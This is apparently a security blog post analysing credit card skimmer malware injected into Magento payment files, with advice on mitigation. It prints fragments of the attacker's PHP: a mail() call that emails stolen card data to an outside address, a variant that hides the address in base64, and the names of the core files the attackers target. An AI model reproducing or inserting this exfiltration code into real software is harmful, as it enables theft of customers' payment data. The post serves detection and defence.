We regularly find malware that tries to steal client credit card details from Magento sites. Hackers use a few tricks and slightly modify their code from time to time.
For example, we’ve seen multiple modifications of the code reported in this article. Instead of using HTTP requests to send data to their own site, hackers often just email the stolen data to their emails.
...
mail("tuyulaustrali@yahoo.com","$data10 From $data6|$data15", "$message");To hide the email address they use the following modification:
...
$idkey = 'Y3NfdG9vbHM0dXNAeWFob28uY29t';
$name ="$data9 Payment";
$encode = base64_decode($idkey);
...
mail($encode, $salt, $payfull, $headr);where Y3NfdG9vbHM0dXNAeWFob28uY29t decodes to cs_tools4us@yahoo.com
Regardless of the actual code, the best way to mitigate this issue is preserve integrity of Magento core files. The files hackers usually modify are:
app/code/core/Mage/Payment/Model/Method/Cc.php
includes/src/Mage_Payment_Model_Method_Cc.phpOf course, removing the malicious code is not enough. You should find and close security holes to prevent reinfections.
